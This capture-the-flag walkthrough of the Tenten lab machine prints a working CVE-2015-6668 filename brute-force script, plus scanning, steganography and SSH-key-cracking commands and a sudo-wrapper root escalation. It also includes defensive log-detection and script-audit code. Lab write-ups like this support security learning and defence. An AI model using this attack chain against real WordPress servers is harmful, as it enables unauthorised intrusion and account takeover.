Tenten

Let’s get started!:)

Level: Intermediate

Reconnaissance

Reconnaissance is the first step: scan the machine to find which services are exposed.

COMMAND: nmap -sC -sV -O -oA tenten 10.10.10.10

Nmap-Scan

From the scan output above, you can see that ports 22 and 80 are open on the machine.

Since port 80 is open, we open the IP in a browser.

URL: http://10.10.10.10

The page above indicates that it is a WordPress site. Let’s enumerate it with wpscan!

COMMAND:

wpscan --url http://10.10.10.10/ --enumerate t --enumerate u

With the help of wpscan we found that the site has a user named takis!

Now let’s enumerate the site’s web pages!

I clicked on Job Listing!

After clicking on Apply Now, the page opens as shown below!

As we can see there is an id in the URL, and we try changing it to 10.

The job title changes, so we also try opening the page with id 11.

To avoid wasting time, we captured the request with Burp Suite and sent it to Intruder for fuzzing.

Intercept the request and send it to Intruder.

Set the attack type to Sniper and the payload to numbers from 8 to 20.

Now start the attack and check every response.

As you can see the attack has begun. Payload 13 looks different from the others, which made us think there might be something special about this page, and sure enough its title is HackerAccessGranted, as you can see below.

As we know, WordPress stores uploaded files under /wp-content/uploads/%year%/%month%/%filename%, so I connected HackerAccessGranted with an image file and, after many attempts, found the right URL using the script below.

I used the CVE-2015-6668 (CV filename disclosure in the Job-Manager WP plugin) code to bruteforce the file name!

import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")
website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')

# WordPress replaces spaces in uploaded file names with hyphens.
filename2 = filename.replace(" ", "-")

# Walk every year/month upload directory and try each CV extension.
for year in range(2013, 2016):
    for i in range(1, 13):
        for extension in ('doc', 'pdf', 'docx'):
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code == 200:
                print("[+] URL of CV found! " + URL)

I modified the code and ran the script against the target machine! Only the loop headers changed: the upload year becomes 2017, and the extension list is widened because the file is an image rather than a CV.

for year in range(2017, 2018):
    for i in range(1, 13):
        for extension in ('php', 'html', 'pdf', 'png', 'gif', 'jpg', 'jpeg'):

BOOM! We found the actual URL of the file!!

Let’s download it and use the steghide tool!

COMMAND: steghide extract -sf HackerAccessGranted.jpg

It asks for a passphrase; just press Enter without one!

Use cat to display the extracted key!

COMMAND: cat id_rsa

Use ssh2john.py to convert the private key into a hash that john can crack.

After converting, use john with the rockyou.txt wordlist to crack the passphrase!

BOOM! We got the passphrase. Let’s use it to connect via SSH.

We got SSH!!

Let’s grab the user flag!!
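From the defender’s side, both steps above (walking the job ids 8 to 20, then hammering the /wp-content/uploads/YYYY/MM/ tree until one guess returns 200) leave an obvious trail in the web server’s access log. The following is an added example, not code from the writeup or from the exploit author: it parses combined-format log lines and flags a client that requests many distinct numeric ids under one path, or that piles up 404s under the uploads directory. The sample log lines are constructed, and the /jobs/apply/ path is an assumption, since the writeup does not show the real URL.

```python
import re
from collections import defaultdict

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status, bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A path that ends in a numeric id, e.g. /jobs/apply/13/ -> prefix "/jobs/apply/", id 13.
ID_PATH_RE = re.compile(r'^(?P<prefix>/.*?/)(?P<id>\d+)/?$')
# A direct hit on the year/month upload tree WordPress uses for media.
UPLOAD_PATH_RE = re.compile(r'^/wp-content/uploads/\d{4}/\d{2}/[^/]+$')


def parse_line(line):
    """Return ip/ts/method/path/status for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def detect(lines, id_threshold=5, upload_404_threshold=10):
    """Flag clients that walk numeric ids under one path, or collect many 404s under uploads/."""
    ids_seen = defaultdict(set)     # (ip, path prefix) -> distinct numeric ids requested
    upload_404 = defaultdict(int)   # ip -> number of 404 responses under /wp-content/uploads/
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec['path'].split('?', 1)[0]
        m = ID_PATH_RE.match(path)
        if m:
            ids_seen[(rec['ip'], m.group('prefix'))].add(int(m.group('id')))
        if rec['status'] == 404 and UPLOAD_PATH_RE.match(path):
            upload_404[rec['ip']] += 1

    findings = []
    for (ip, prefix), ids in sorted(ids_seen.items()):
        if len(ids) >= id_threshold:
            findings.append({'ip': ip, 'rule': 'sequential_id_enumeration',
                             'prefix': prefix, 'ids': sorted(ids)})
    for ip, count in sorted(upload_404.items()):
        if count >= upload_404_threshold:
            findings.append({'ip': ip, 'rule': 'upload_path_bruteforce', 'count': count})
    return findings


def build_sample_log():
    """Constructed sample log (not from the writeup): one client enumerating job ids and then
    probing the uploads tree, plus a normal visitor. The /jobs/apply/ path is an assumption."""
    lines = []
    for n, job_id in enumerate(range(8, 21)):
        lines.append(f'10.10.14.5 - - [01/Jan/2017:10:00:{n:02d} +0000] '
                     f'"GET /jobs/apply/{job_id}/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    k = 0
    for month in range(1, 13):
        for ext in ('php', 'html', 'pdf', 'png', 'gif', 'jpg', 'jpeg'):
            # Exactly one guess hits in this constructed data; every other probe is a 404.
            status = 200 if (month == 4 and ext == 'jpg') else 404
            lines.append(f'10.10.14.5 - - [01/Jan/2017:10:01:{k % 60:02d} +0000] '
                         f'"GET /wp-content/uploads/2017/{month:02d}/HackerAccessGranted.{ext} HTTP/1.1" '
                         f'{status} 0 "-" "python-requests/2.18.4"')
            k += 1
    lines.append('10.10.14.9 - - [01/Jan/2017:10:05:00 +0000] '
                 '"GET /jobs/apply/10/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    lines.append('10.10.14.9 - - [01/Jan/2017:10:05:30 +0000] '
                 '"GET /jobs/apply/11/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    return lines


if __name__ == '__main__':
    for finding in detect(build_sample_log()):
        print(finding)
```

The thresholds are tuning knobs: a legitimate visitor reading a handful of listings (the second client above) stays under them, while the enumerating client trips both rules. In production you would also bucket by time window rather than over the whole file.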

Privilege escalation
Now that we have user access we need to elevate our permissions to root. Let’s start by gathering system information.

takis@tenten:~$ cat /etc/issue
Ubuntu 16.04.2 LTS \n \l

Checking what we are allowed to run with sudo shows that we have access to a file called “/bin/fuckin”.

We need to find out what is in this file.

fuckin turns out to be a shell script that runs the arguments we pass to it.

Adding an argument after the file name while running it with sudo lets us run commands as root.

Passing bash as the first argument gives us a root shell.
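The root cause here is a sudo-allowed script that lets its caller choose the command that runs. The following is an added example, not the writeup’s code and not the contents of /bin/fuckin (which the writeup never shows): a small audit that scans a shell script for lines where a positional parameter is executed as the command or handed to eval/exec/`sh -c`, and, next to the risky pattern, a hardened wrapper built on a fixed allow-list. The three script bodies are constructed for illustration.

```python
import re

# A line whose first word is a positional parameter: the caller picks the program that runs.
POSITIONAL_AS_COMMAND = re.compile(
    r'^\s*"?\$(?:[1-9]\d*|@|\*|\{[1-9]\d*\}|\{@\}|\{\*\})"?(?:\s|$)')
# eval, exec or a nested "sh -c" whose text includes a positional parameter.
EVAL_WITH_POSITIONAL = re.compile(
    r'^\s*(?:eval|exec|(?:/bin/)?(?:ba)?sh\s+-c)\b.*\$(?:[1-9]|@|\*|\{)')


def audit_wrapper(script_text):
    """Return (line number, reason) for each line that lets an argument become a command."""
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        code = raw.split('#', 1)[0]   # drop trailing comments (good enough for this heuristic)
        if POSITIONAL_AS_COMMAND.match(code):
            findings.append((lineno, 'positional parameter run as the command'))
        elif EVAL_WITH_POSITIONAL.match(code):
            findings.append((lineno, 'shell evaluates text taken from a positional parameter'))
    return findings


# Constructed examples (not the real /bin/fuckin, whose contents the writeup does not show).
RISKY_WRAPPER = '''#!/bin/bash
# Runs whatever the caller names, with the caller's remaining arguments.
$1 $2 $3
'''

RISKY_WRAPPER_SH_C = '''#!/bin/bash
# Same problem one layer down: the argument is handed to a fresh shell as code.
bash -c "$1"
'''

SAFE_WRAPPER = '''#!/bin/bash
# Hardened form: a fixed allow-list of actions; arguments select, they never execute.
case "$1" in
  status)  systemctl status nginx ;;
  restart) systemctl restart nginx ;;
  *)       echo "usage: $0 {status|restart}" >&2; exit 1 ;;
esac
'''

if __name__ == '__main__':
    for name, text in (('risky', RISKY_WRAPPER),
                       ('risky sh -c', RISKY_WRAPPER_SH_C),
                       ('safe', SAFE_WRAPPER)):
        print(name, audit_wrapper(text))
```

Run it over every script referenced from sudoers; anything the audit flags is effectively a sudo rule for ALL, whatever the sudoers line itself says. The allow-list form is the fix: sudo can then be restricted to that one script and the arguments can only pick from the listed actions.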

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r
